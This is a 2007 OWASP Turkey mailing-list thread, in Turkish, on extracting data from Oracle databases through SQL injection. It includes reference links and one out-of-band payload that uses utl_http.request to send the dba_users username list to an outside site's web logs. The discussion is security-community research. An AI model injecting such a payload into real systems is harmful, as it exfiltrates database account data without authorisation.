[Owasp-turkey] Data Mining with SQL Injection

Deniz CEVIK denizcev at gmail.com
Thu Sep 13 08:38:58 EDT 2007


Aslında dün araştırma yaparken bazı kaynaklar buldum ve oracle jdbc ile
bağlanan bir sistem üzerinde test etme imkanımda oldu.

İlk önce üstadın sitesinden başlayalım -
http://ferruh.mavituna.com/makale/sql-injection-union-ile-data-okuma/
http://www.databasesecurity.com/webapps/sqlinference.pdf
http://www.blackhat.com/presentations/bh-europe-05/bh-eu-05-litchfield.pdf
Yukarıdaki iki link ise daha çok blind sql injection'da data mining ile
ilgili bilgiler içeriyor ancak oldukça faydalı

out-of-band data mining için ise aşağıdaki linklerde güzel bilgiler var.

http://www.hideaway.net/2007/08/out-of-band-oracle-sql-injection-with.html
http://video.google.com/videoplay?docid=3470216843068111954&hl=en
http://www.inspectit.se/dc15/Defcon_15_Presentation_Web.pdf

OOB data-minin için eğer Oracle DB kullanılıyor ise

select utl_http.request('http://site/'|| (select username from dba_users))
from dual--
gibi bir ifade enjecte edilebilirse site nin web server loglarında sql'in
sonucunu görmek mümkün olabiliyormuş.
Ancak bu sql'i kullanabilmek için önceki sql syntax'ini iptal etmek
gerekecek. Ancak jdbc de malesef ; karakteri
işe yaramadığı için bunu test edemedim.

Herkese İyi Çalışmalar





On 9/13/07, Bedirhan Urgun <urgunb at hotmail.com> wrote:
>
>
>  Merhaba,
>  Oracle'da sql injection, sunucuda dusuk hakli kullanici elde edilmesinden
> veya uygulamadan cagrilan problemli anonymous PL/SQL bloklarinin
> bulunmasindan sonra yapilacak seylere yogunlasildigindan bu tur calismalar
> eksik kalmis galiba. Ya da herkes mssql'e yuklenmis...
>
>  Gerci calisma yapilacak kadar Oracle'a ozel bilgi (digerlerinde
> bulunan sql enjeksiyonu hata mesajlari Oracle icin de ayni; mesela sutun
> sayisinin veya tiplerinin bulunmasi) cikar mi onu da bilmiyorum.
>
>  Data mining ile pek alakasi yok ama oraDB kodlarinin aranabilecegi bi
> firefox extension'i belki bilmeyenlere faydali olabilir;
>   https://addons.mozilla.org/en-US/firefox/addon/1314
>
>  Eger arastirmalariniz sonucu bisey cikarsa duymak isterim.
>
>  bedirhan
>
>
>
>  ------------------------------
> Date: Wed, 12 Sep 2007 14:55:21 +0200
> From: denizcev at gmail.com
> To: owasp-turkey at lists.owasp.org
> Subject: [Owasp-turkey] Data Mining with SQL Injection
>
> Selamlar,
>
>
> Özellikle oracle'a yönelik web üzerinden error based sql injection'larda
> data mining nasıl yapıldığı konusunda elinde detaylı bilgi bulunan arkadaş
> var mı?
>
>
> İyi Çalışmalar.
>
>
> ------------------------------
> Gear up for Halo(r) 3 and get a $25 Best Buy gift card. It's our way of
> saying thanks for using Windows Live™. Get it now!<http://gethalo3gear.com?ocid=SeptemberWLHalo3_WLHMTxt_1>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-turkey/attachments/20070913/bf12aa8b/attachment.html 


More information about the Owasp-turkey mailing list